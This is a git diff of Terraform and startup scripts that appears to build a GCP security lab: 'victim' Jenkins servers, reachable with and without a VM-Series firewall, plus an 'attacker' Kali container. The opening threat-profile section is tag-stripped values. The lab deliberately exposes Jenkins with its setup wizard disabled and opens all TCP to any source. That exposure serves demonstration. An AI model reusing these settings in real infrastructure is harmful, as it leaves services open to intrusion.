+ alert
+ alert
+
+
+ default
+ default
+
+
+
+
+
+
+ default
+ reset-both
+
+
+ default
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ default
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+
+
+
+
+ default
+ reset-both
+
+
+ default
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ default
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+
+
+
+
+ default
+ reset-both
+
+
+ default
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ default
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+
+
+
+
+ default
+ default
+
+
+ default
+ default
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ default
+ default
+
+
+ reset-both
+ reset-both
+
+
+ Use this profile for rules needing modifications to the standard
+
+
+
+
+ drop
+ drop
+
+
+ drop
+ drop
+
+
+ drop
+ drop
+
+
+ drop
+ drop
+
+
+ drop
+ drop
+
+
+ drop
+ drop
+
+
+ yes
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ critical
+ high
+ medium
+
+
+ any
+
+ any
+ any
+ any
+ single-packet
+
+
+
+
+
+
+ any
+
+
+ low
+ informational
+
+
+ any
+
+ any
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ critical
+ high
+ medium
+
+
+ any
+
+ any
+ any
+ any
+ single-packet
+
+
+
+
+
+
+ any
+
+
+ low
+ informational
+
+
+ any
+
+ any
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ critical
+ high
+
+
+ any
+
+ any
+ any
+ any
+ single-packet
+
+
+
+
+
+
+ any
+
+
+ low
+ informational
+ medium
+
+
+ any
+
+ any
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+ any
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ critical
+ high
+ medium
+ low
+
+
+ any
+
+ any
+ any
+ any
+ single-packet
+
+
+
+
+
+
+ Internal
+
+
+ informational
+
+
+ any
+
+ any
+ any
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ informational
+
+
+ any
+
+ any
+ any
+ any
+ extended-capture
+
+
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ public-cloud
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ public-cloud
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ public-cloud
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ public-cloud
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ public-cloud
+
+
+
+
+
+
+
+
+ Outbound-AV
+
+
+ Outbound-AS
+
+
+ Outbound-VP
+
+
+ Outbound-URL
+
+
+ Outbound-FB
+
+
+ Outbound-WF
+
+
+
+
+ Inbound-AV
+
+
+ Inbound-AS
+
+
+ Inbound-VP
+
+
+ Inbound-FB
+
+
+ Inbound-WF
+
+
+
+
+ Internal-AV
+
+
+ Internal-AS
+
+
+ Internal-VP
+
+
+ Internal-FB
+
+
+ Internal-WF
+
+
+
+
+ Alert-Only-AV
+
+
+ Alert-Only-AS
+
+
+ Alert-Only-VP
+
+
+ Alert-Only-URL
+
+
+ Alert-Only-FB
+
+
+ Alert-Only-WF
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/init-cfg.txt b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/init-cfg.txt
new file mode 100644
index 00000000..04c10233
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/init-cfg.txt
@@ -0,0 +1,3 @@
+dns-primary=8.8.8.8
+dns-secondary=8.8.4.4
+op-command-modes=mgmt-interface-swap
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/null.txt b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/null.txt
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/null.txt
@@ -0,0 +1 @@
+
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/firewall.tf b/gcp/Jenkins_proj-master/WebInDeploy/firewall.tf
new file mode 100644
index 00000000..7e1b2cdb
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/firewall.tf
@@ -0,0 +1,57 @@
+resource "google_compute_instance" "firewall" {
+ project = "${google_project.victim_project.id}"
+ name = "firewall"
+ machine_type = "n1-standard-4"
+ zone = "${var.GCP_Zone}"
+ min_cpu_platform = "Intel Skylake"
+ can_ip_forward = true
+ allow_stopping_for_update = true
+ timeouts = {
+ create = "15m"
+ delete = "60m"
+ }
+ depends_on = ["google_storage_bucket_object.init_cfg",
+ "google_storage_bucket_object.bootstrap",
+ "google_storage_bucket_object.content",
+ "google_storage_bucket_object.software",
+ "google_storage_bucket_object.license",
+ "google_project_service.victim_project"
+ ]
+ // Adding METADATA Key Value pairs to VM-Series GCE instance
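+ // vmseries-bootstrap-gce-storagebucket points the VM-Series at the GCS bucket holding the
+ // config/, content/, software/ and license/ bootstrap folders created in bootstrap.tf.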
+ metadata {
+ vmseries-bootstrap-gce-storagebucket = "${google_storage_bucket.bootstrap_bucket.name}"
+ serial-port-enable = true
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+ }
+
+ network_interface {
+ subnetwork = "${google_compute_subnetwork.untrust_subnet.self_link}"
+ network_ip = "${var.FW_Untrust_IP}"
+ access_config = {}
+ }
+
+ network_interface {
+ subnetwork = "${google_compute_subnetwork.management_subnet.self_link}"
+ network_ip = "${var.FW_Mgmt_IP}"
+ access_config = {}
+ }
+
+ network_interface {
+ subnetwork = "${google_compute_subnetwork.trust_subnet.self_link}"
+ network_ip = "${var.FW_Trust_IP}"
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle2-814"
+ }
+ }
+}
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/gcp_firewall.tf b/gcp/Jenkins_proj-master/WebInDeploy/gcp_firewall.tf
new file mode 100644
index 00000000..382aaade
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/gcp_firewall.tf
@@ -0,0 +1,34 @@
+resource "google_compute_firewall" "management" {
+ name = "management-firewall"
+ project = "${google_project.victim_project.id}"
+ network = "${google_compute_network.management_network.name}"
+ allow {
+ protocol = "tcp"
+ ports = ["22", "443"]
+ }
+}
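+# The untrust and trust rules below allow all TCP from any source (GCP defaults the
+# source range to 0.0.0.0/0 when none is set); filtering is left to the VM-Series firewall.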
+resource "google_compute_firewall" "untrust" {
+ name = "untrust-firewall"
+ project = "${google_project.victim_project.id}"
+ network = "${google_compute_network.untrust_network.name}"
+ allow {
+ protocol = "tcp"
+ }
+}
+resource "google_compute_firewall" "trust" {
+ name = "trust-firewall"
+ project = "${google_project.victim_project.id}"
+ network = "${google_compute_network.trust_network.name}"
+ allow {
+ protocol = "tcp"
+ }
+}
+resource "google_compute_firewall" "attacker" {
+ name = "attacker-firewall"
+ project = "${google_project.attacker_project.id}"
+ network = "${google_compute_network.attacker_network.name}"
+ allow {
+ protocol = "tcp"
+ ports = ["22", "443", "5000"]
+ }
+}
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/gcp_vars.tf b/gcp/Jenkins_proj-master/WebInDeploy/gcp_vars.tf
new file mode 100644
index 00000000..793bc6c5
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/gcp_vars.tf
@@ -0,0 +1,16 @@
+variable "Billing_Account" {}
+variable "Victim_Project_Name" {}
+variable "Attacker_Project_Name" {}
+variable "GCP_Region" {}
+variable "GCP_Zone" {}
+variable "Management_Subnet_CIDR" {}
+variable "Untrust_Subnet_CIDR" {}
+variable "Trust_Subnet_CIDR" {}
+variable "Attacker_Subnet_CIDR" {}
+variable "FW_Mgmt_IP" {}
+variable "FW_Untrust_IP" {}
+variable "FW_Trust_IP" {}
+variable "WebLB_IP" {}
+variable "Webserver_IP1" {}
+variable "Webserver_IP2" {}
+variable "Attacker_IP" {}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/initialize_attacker.sh b/gcp/Jenkins_proj-master/WebInDeploy/initialize_attacker.sh
new file mode 100644
index 00000000..032feb65
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/initialize_attacker.sh
@@ -0,0 +1,14 @@
+#!/bin/bash
+apt-get update
+apt-get update
+apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
+pip3 install docker-compose
+cd /var/tmp
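+# Write a minimal docker-compose.yml line by line, then start the Kali-based attacker container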
+echo "version: '3'" > docker-compose.yml
+echo "services:" >> docker-compose.yml
+echo " attacker:" >> docker-compose.yml
+echo " image: pglynn/kali:latest" >> docker-compose.yml
+echo " ports:" >> docker-compose.yml
+echo " - \"443:443\"" >> docker-compose.yml
+echo " - \"5000:5000\"" >> docker-compose.yml
+docker-compose up -d
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/initialize_webserver.sh b/gcp/Jenkins_proj-master/WebInDeploy/initialize_webserver.sh
new file mode 100644
index 00000000..55324851
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/initialize_webserver.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+apt-get update
+apt-get update
+apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
+pip3 install docker-compose
+cd /var/tmp
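+# Write a minimal docker-compose.yml line by line, then start the Jenkins container on ports 8080/50000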
+echo "version: '3'" > docker-compose.yml
+echo "services:" >> docker-compose.yml
+echo " jenkins:" >> docker-compose.yml
+echo " image: pglynn/jenkins:version1.0" >> docker-compose.yml
+echo " environment:" >> docker-compose.yml
+echo " JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml
+echo " JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml
+echo " ports:" >> docker-compose.yml
+echo " - \"50000:50000\"" >> docker-compose.yml
+echo " - \"8080:8080\"" >> docker-compose.yml
+docker-compose up -d
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/lb-firewall.tf b/gcp/Jenkins_proj-master/WebInDeploy/lb-firewall.tf
new file mode 100644
index 00000000..2897a657
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/lb-firewall.tf
@@ -0,0 +1,147 @@
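+# Inbound web traffic is steered through the VM-Series: the global forwarding rule and Cloud
+# Armor policy defined here front the firewall instance group, and the firewall forwards
+# permitted traffic on to the internal load balancer defined at the bottom of this file.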
+resource "google_compute_instance_group" "firewalls" {
+ name = "firewalls-instance-group"
+ description = "An instance group for the single FW instance"
+ project = "${google_project.victim_project.id}"
+ zone = "${var.GCP_Zone}"
+
+ instances = [
+ "${google_compute_instance.firewall.self_link}",
+ ]
+ named_port {
+ name = "http-8080"
+ port = "8080"
+ }
+}
+resource "google_compute_target_pool" "firewalls" {
+ name = "armor-pool-firewalls"
+ project = "${google_project.victim_project.id}"
+
+ instances = [
+ "${google_compute_instance.firewall.self_link}",
+ ]
+
+ health_checks = [
+ "${google_compute_http_health_check.health.name}",
+ ]
+}
+resource "google_compute_backend_service" "firewalls" {
+ name = "armor-backend-firewalls"
+ description = "With FW"
+ project = "${google_project.victim_project.id}"
+ port_name = "http-8080"
+ protocol = "HTTP"
+ timeout_sec = 10
+ enable_cdn = false
+
+ backend {
+ group = "${google_compute_instance_group.firewalls.self_link}"
+ }
+
+ security_policy = "${google_compute_security_policy.security-policy-firewalls.self_link}"
+
+ health_checks = ["${google_compute_http_health_check.health.self_link}"]
+}
+resource "google_compute_security_policy" "security-policy-firewalls" {
+ name = "armor-security-policy-firewalls"
+ description = "example security policy"
+ project = "${google_project.victim_project.id}"
+
+ # Reject all traffic that hasn't been whitelisted.
+ rule {
+ action = "deny(403)"
+ priority = "2147483647"
+
+ match {
+ versioned_expr = "SRC_IPS_V1"
+
+ config {
+ src_ip_ranges = ["*"]
+ }
+ }
+
+ description = "Default rule, higher priority overrides it"
+ }
+ # Allow traffic from all source IPs (0.0.0.0/0); this takes priority over the default deny rule above
+ rule {
+ action = "allow"
+ priority = "1000"
+
+ match {
+ versioned_expr = "SRC_IPS_V1"
+
+ config {
+ src_ip_ranges = ["0.0.0.0/0"]
+ }
+ }
+ }
+}
+resource "google_compute_global_forwarding_rule" "firewalls" {
+ name = "armor-rule-firewalls"
+ project = "${google_project.victim_project.id}"
+ target = "${google_compute_target_http_proxy.firewalls.self_link}"
+ port_range = "80"
+}
+resource "google_compute_target_http_proxy" "firewalls" {
+ name = "armor-proxy-firewalls"
+ project = "${google_project.victim_project.id}"
+ url_map = "${google_compute_url_map.firewalls.self_link}"
+}
+resource "google_compute_url_map" "firewalls" {
+ name = "armor-url-map-firewalls"
+ project = "${google_project.victim_project.id}"
+ default_service = "${google_compute_backend_service.firewalls.self_link}"
+
+ host_rule {
+ hosts = ["with-firewalls.com"]
+ path_matcher = "allpaths"
+ }
+ path_matcher {
+ name = "allpaths"
+ default_service = "${google_compute_backend_service.firewalls.self_link}"
+
+ path_rule {
+ paths = ["/*"]
+ service = "${google_compute_backend_service.firewalls.self_link}"
+ }
+ }
+}
+resource "google_compute_health_check" "tcp-8080" {
+ name = "tcp-8080"
+ project = "${google_project.victim_project.id}"
+ check_interval_sec = 1
+ timeout_sec = 1
+
+ tcp_health_check {
+ port = "8080"
+ }
+}
+resource "google_compute_instance_group" "ilb-webservers" {
+ name = "ilb-webserver-instance-group"
+ description = "An instance group for the webserver"
+ project = "${google_project.victim_project.id}"
+ zone = "${var.GCP_Zone}"
+
+ instances = [
+ "${google_compute_instance.jenkins2.self_link}",
+ ]
+}
+resource "google_compute_region_backend_service" "ilb-webserver" {
+ name = "ilb-webserver"
+ project = "${google_project.victim_project.id}"
+ region = "${var.GCP_Region}"
+ health_checks = ["${google_compute_health_check.tcp-8080.self_link}"]
+
+ backend {
+ group = "${google_compute_instance_group.ilb-webservers.self_link}"
+ }
+}
+resource "google_compute_forwarding_rule" "ilb-webserver-forwarding-rule" {
+ name = "ilb-webserver-forwarding-rule"
+ project = "${google_project.victim_project.id}"
+ load_balancing_scheme = "INTERNAL"
+ ip_address = "${var.WebLB_IP}"
+ ports = ["8080"]
+ network = "${google_compute_network.trust_network.self_link}"
+ subnetwork = "${google_compute_subnetwork.trust_subnet.self_link}"
+ backend_service = "${google_compute_region_backend_service.ilb-webserver.self_link}"
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/lb-webserver.tf b/gcp/Jenkins_proj-master/WebInDeploy/lb-webserver.tf
new file mode 100644
index 00000000..6f4d872a
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/lb-webserver.tf
@@ -0,0 +1,115 @@
+resource "google_compute_instance_group" "webservers" {
+ name = "webserver-instance-group"
+ description = "An instance group for the webserver"
+ project = "${google_project.victim_project.id}"
+ zone = "${var.GCP_Zone}"
+
+ instances = [
+ "${google_compute_instance.jenkins1.self_link}",
+ ]
+ named_port {
+ name = "http-8080"
+ port = "8080"
+ }
+}
+resource "google_compute_target_pool" "webservers" {
+ name = "armor-pool-webservers"
+ project = "${google_project.victim_project.id}"
+
+ instances = [
+ "${google_compute_instance.jenkins1.self_link}",
+ ]
+
+ health_checks = [
+ "${google_compute_http_health_check.health.name}",
+ ]
+}
+resource "google_compute_http_health_check" "health" {
+ name = "armor-healthcheck"
+ project = "${google_project.victim_project.id}"
+ port = 8080
+ request_path = "/"
+ check_interval_sec = 1
+ timeout_sec = 1
+}
+resource "google_compute_backend_service" "webservers" {
+ name = "armor-backend-webservers"
+ description = "Our company website"
+ project = "${google_project.victim_project.id}"
+ port_name = "http-8080"
+ protocol = "HTTP"
+ timeout_sec = 10
+ enable_cdn = false
+
+ backend {
+ group = "${google_compute_instance_group.webservers.self_link}"
+ }
+
+ security_policy = "${google_compute_security_policy.security-policy-webservers.self_link}"
+
+ health_checks = ["${google_compute_http_health_check.health.self_link}"]
+}
+resource "google_compute_security_policy" "security-policy-webservers" {
+ name = "armor-security-policy-webservers"
+ description = "example security policy"
+ project = "${google_project.victim_project.id}"
+
+ # Reject all traffic that hasn't been whitelisted.
+ rule {
+ action = "deny(403)"
+ priority = "2147483647"
+
+ match {
+ versioned_expr = "SRC_IPS_V1"
+
+ config {
+ src_ip_ranges = ["*"]
+ }
+ }
+
+ description = "Default rule, higher priority overrides it"
+ }
+ # Allow traffic from all source IPs (0.0.0.0/0); this takes priority over the default deny rule above
+ rule {
+ action = "allow"
+ priority = "1000"
+
+ match {
+ versioned_expr = "SRC_IPS_V1"
+
+ config {
+ src_ip_ranges = ["0.0.0.0/0"]
+ }
+ }
+ }
+}
+resource "google_compute_global_forwarding_rule" "webservers" {
+ name = "armor-rule-webservers"
+ project = "${google_project.victim_project.id}"
+ target = "${google_compute_target_http_proxy.webservers.self_link}"
+ port_range = "80"
+}
+resource "google_compute_target_http_proxy" "webservers" {
+ name = "armor-proxy-webservers"
+ project = "${google_project.victim_project.id}"
+ url_map = "${google_compute_url_map.webservers.self_link}"
+}
+resource "google_compute_url_map" "webservers" {
+ name = "armor-url-map-webservers"
+ project = "${google_project.victim_project.id}"
+ default_service = "${google_compute_backend_service.webservers.self_link}"
+
+ host_rule {
+ hosts = ["sans-firewalls.com"]
+ path_matcher = "allpaths"
+ }
+ path_matcher {
+ name = "allpaths"
+ default_service = "${google_compute_backend_service.webservers.self_link}"
+
+ path_rule {
+ paths = ["/*"]
+ service = "${google_compute_backend_service.webservers.self_link}"
+ }
+ }
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/main.tf b/gcp/Jenkins_proj-master/WebInDeploy/main.tf
new file mode 100644
index 00000000..2039e938
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/main.tf
@@ -0,0 +1,5 @@
+provider "google" {
+ region = "${var.GCP_Region}"
+}
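+# No credentials are hard-coded; the Google provider falls back to the environment
+# (e.g. GOOGLE_APPLICATION_CREDENTIALS or gcloud application-default credentials).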
+
+provider "random" {}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/output.tf b/gcp/Jenkins_proj-master/WebInDeploy/output.tf
new file mode 100644
index 00000000..b96cf54d
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/output.tf
@@ -0,0 +1,15 @@
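+# firewall.tf attaches NICs in the order untrust (0), management (1), trust (2), so index 1 below is the management interface's external NAT address.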
+output "FW_Mgmt_IP" {
+ value = "${google_compute_instance.firewall.network_interface.1.access_config.0.nat_ip}"
+}
+
+output "ALB-DNS" {
+ value = "${google_compute_global_forwarding_rule.firewalls.ip_address}"
+}
+
+output "NATIVE-DNS" {
+ value = "${google_compute_global_forwarding_rule.webservers.ip_address}"
+}
+
+output "ATTACKER_IP" {
+ value = "${google_compute_instance.attacker.network_interface.0.access_config.0.nat_ip}"
+}
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/project.tf b/gcp/Jenkins_proj-master/WebInDeploy/project.tf
new file mode 100644
index 00000000..10a1036d
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/project.tf
@@ -0,0 +1,25 @@
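+# A two-byte random suffix keeps the victim and attacker project names and IDs globally unique across deployments.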
+resource "random_id" "project_number" {
+ byte_length = 2
+}
+resource "google_project" "victim_project" {
+ name = "${var.Victim_Project_Name}-${random_id.project_number.hex}"
+ project_id = "${var.Victim_Project_Name}-${random_id.project_number.hex}"
+ billing_account = "${var.Billing_Account}"
+ auto_create_network = false
+}
+resource "google_project_service" "victim_project" {
+ project = "${google_project.victim_project.project_id}",
+ service = "storage-api.googleapis.com"
+ disable_dependent_services = true
+}
+resource "google_project" "attacker_project" {
+ name = "${var.Attacker_Project_Name}-${random_id.project_number.hex}"
+ project_id = "${var.Attacker_Project_Name}-${random_id.project_number.hex}"
+ billing_account = "${var.Billing_Account}"
+ auto_create_network = false
+}
+resource "google_project_service" "attacker_project" {
+ project = "${google_project.attacker_project.project_id}",
+ service = "storage-api.googleapis.com"
+ disable_dependent_services = true
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh b/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh
new file mode 100644
index 00000000..032feb65
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh
@@ -0,0 +1,14 @@
+#!/bin/bash
+apt-get update
+apt-get update
+apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
+pip3 install docker-compose
+cd /var/tmp
+echo "version: '3'" > docker-compose.yml
+echo "services:" >> docker-compose.yml
+echo " attacker:" >> docker-compose.yml
+echo " image: pglynn/kali:latest" >> docker-compose.yml
+echo " ports:" >> docker-compose.yml
+echo " - \"443:443\"" >> docker-compose.yml
+echo " - \"5000:5000\"" >> docker-compose.yml
+docker-compose up -d
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh b/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh
new file mode 100644
index 00000000..bb37c3e5
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+apt-get update
+apt-get update
+apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
+pip3 install docker-compose
+cd /var/tmp
+echo "version: '3'" > docker-compose.yml
+echo "services:" >> docker-compose.yml
+echo " jenkins:" >> docker-compose.yml
+echo " image: pglynn/jenkins:latest" >> docker-compose.yml
+echo " environment:" >> docker-compose.yml
+echo " JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml
+echo " JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml
+echo " ports:" >> docker-compose.yml
+echo " - \"50000:50000\"" >> docker-compose.yml
+echo " - \"8080:8080\"" >> docker-compose.yml
+docker-compose up -d
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/terraform.tfvars b/gcp/Jenkins_proj-master/WebInDeploy/terraform.tfvars
new file mode 100644
index 00000000..20f487e7
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/terraform.tfvars
@@ -0,0 +1,31 @@
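+# Set Billing_Account to your GCP billing account ID (format XXXXXX-XXXXXX-XXXXXX) before applying.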
+Billing_Account = ""
+
+Attacker_Project_Name = "attacker"
+
+Victim_Project_Name = "jenkins"
+
+GCP_Region = "us-central1"
+
+GCP_Zone = "us-central1-a"
+
+Management_Subnet_CIDR = "10.0.0.0/24"
+
+Untrust_Subnet_CIDR = "10.0.1.0/24"
+
+Trust_Subnet_CIDR = "10.0.2.0/24"
+
+Attacker_Subnet_CIDR = "10.1.1.0/24"
+
+FW_Mgmt_IP = "10.0.0.10"
+
+FW_Untrust_IP = "10.0.1.10"
+
+FW_Trust_IP = "10.0.2.10"
+
+WebLB_IP = "10.0.2.30"
+
+Webserver_IP1 = "10.0.2.50"
+
+Webserver_IP2 = "10.0.2.60"
+
+Attacker_IP = "10.1.1.50"
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/vpc-subnets.tf b/gcp/Jenkins_proj-master/WebInDeploy/vpc-subnets.tf
new file mode 100644
index 00000000..811e40dd
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/vpc-subnets.tf
@@ -0,0 +1,48 @@
+resource "google_compute_network" "management_network" {
+ project = "${google_project.victim_project.id}"
+ name = "management"
+ auto_create_subnetworks = false
+}
+resource "google_compute_network" "untrust_network" {
+ project = "${google_project.victim_project.id}"
+ name = "untrust"
+ auto_create_subnetworks = false
+}
+resource "google_compute_network" "trust_network" {
+ project = "${google_project.victim_project.id}"
+ name = "trust"
+ auto_create_subnetworks = false
+}
+resource "google_compute_network" "attacker_network" {
+ project = "${google_project.attacker_project.id}"
+ name = "attacker"
+ auto_create_subnetworks = false
+}
+resource "google_compute_subnetwork" "management_subnet" {
+ name = "management"
+ project = "${google_project.victim_project.id}"
+ region = "${var.GCP_Region}"
+ ip_cidr_range = "${var.Management_Subnet_CIDR}"
+ network = "${google_compute_network.management_network.self_link}"
+}
+resource "google_compute_subnetwork" "untrust_subnet" {
+ name = "untrust"
+ project = "${google_project.victim_project.id}"
+ region = "${var.GCP_Region}"
+ ip_cidr_range = "${var.Untrust_Subnet_CIDR}"
+ network = "${google_compute_network.untrust_network.self_link}"
+}
+resource "google_compute_subnetwork" "trust_subnet" {
+ name = "trust"
+ project = "${google_project.victim_project.id}"
+ region = "${var.GCP_Region}"
+ ip_cidr_range = "${var.Trust_Subnet_CIDR}"
+ network = "${google_compute_network.trust_network.self_link}"
+}
+resource "google_compute_subnetwork" "attacker_subnet" {
+ name = "attacker"
+ project = "${google_project.attacker_project.id}"
+ region = "${var.GCP_Region}"
+ ip_cidr_range = "${var.Attacker_Subnet_CIDR}"
+ network = "${google_compute_network.attacker_network.self_link}"
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/webservers.tf b/gcp/Jenkins_proj-master/WebInDeploy/webservers.tf
new file mode 100644
index 00000000..bb9d328e
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/webservers.tf
@@ -0,0 +1,80 @@
+resource "google_compute_instance" "jenkins1" {
+ name = "jenkins1"
+ project = "${google_project.victim_project.id}"
+ zone = "${var.GCP_Zone}"
+ machine_type = "n1-standard-1"
+ allow_stopping_for_update = true
+ timeouts = {
+ create = "15m"
+ delete = "60m"
+ }
+ depends_on = [
+ "google_storage_bucket_object.config_file_webserver",
+ "google_project_service.victim_project"
+ ]
+ metadata {
+ startup-script-url = "gs://${google_storage_bucket.bootstrap_bucket.name}/initialize_webserver.sh"
+ serial-port-enable = true
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ "https://www.googleapis.com/auth/compute.readonly",
+ ]
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "ubuntu-os-cloud/ubuntu-1604-lts"
+ }
+ }
+
+ network_interface {
+ subnetwork = "${google_compute_subnetwork.trust_subnet.self_link}"
+ network_ip = "${var.Webserver_IP1}"
+ access_config = {}
+ }
+ depends_on = ["google_storage_bucket_object.config_file_webserver"]
+}
+resource "google_compute_instance" "jenkins2" {
+ name = "jenkins2"
+ project = "${google_project.victim_project.id}"
+ zone = "${var.GCP_Zone}"
+ machine_type = "n1-standard-1"
+ allow_stopping_for_update = true
+ depends_on = [
+ "google_storage_bucket_object.config_file_webserver",
+ "google_project_service.victim_project"
+ ]
+ metadata {
+ startup-script-url = "gs://${google_storage_bucket.bootstrap_bucket.name}/initialize_webserver.sh"
+ serial-port-enable = true
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ "https://www.googleapis.com/auth/compute.readonly",
+ ]
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "ubuntu-os-cloud/ubuntu-1604-lts"
+ }
+ }
+
+ network_interface {
+ subnetwork = "${google_compute_subnetwork.trust_subnet.self_link}"
+ network_ip = "${var.Webserver_IP2}"
+ access_config = {}
+ }
+ depends_on = ["google_storage_bucket_object.config_file_webserver"]
+}
diff --git a/gcp/Jenkins_proj-master/WebInFWConf/firewallconfig.tf b/gcp/Jenkins_proj-master/WebInFWConf/firewallconfig.tf
new file mode 100644
index 00000000..d9bdc901
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInFWConf/firewallconfig.tf
@@ -0,0 +1,233 @@
+provider "panos" {
+ hostname = "${var.FW_Mgmt_IP}"
+ username = "${var.Admin_Username}"
+ password = "${var.Admin_Password}"
+}
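+
+# These values are declared in gcp_vars.tf and normally supplied via terraform.tfvars or
+# -var flags; FW_Mgmt_IP is typically taken from the WebInDeploy output of the same name.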
+
+resource "panos_management_profile" "imp_allow_ping" {
+ name = "Allow ping"
+ ping = true
+}
+
+resource "panos_ethernet_interface" "eth1_1" {
+ name = "ethernet1/1"
+ vsys = "vsys1"
+ mode = "layer3"
+ comment = "External interface"
+ enable_dhcp = true
+ create_dhcp_default_route = true
+ management_profile = "${panos_management_profile.imp_allow_ping.name}"
+}
+
+resource "panos_ethernet_interface" "eth1_2" {
+ name = "ethernet1/2"
+ vsys = "vsys1"
+ mode = "layer3"
+ comment = "Web interface"
+ enable_dhcp = true
+}
+
+resource "panos_zone" "zone_untrust" {
+ name = "UNTRUST"
+ mode = "layer3"
+ interfaces = ["${panos_ethernet_interface.eth1_1.name}"]
+}
+
+resource "panos_zone" "zone_trust" {
+ name = "TRUST"
+ mode = "layer3"
+ interfaces = ["${panos_ethernet_interface.eth1_2.name}"]
+}
+
+resource "panos_service_object" "so_22" {
+ name = "service-tcp-22"
+ protocol = "tcp"
+ destination_port = "22"
+}
+
+resource "panos_service_object" "so_221" {
+ name = "service-tcp-221"
+ protocol = "tcp"
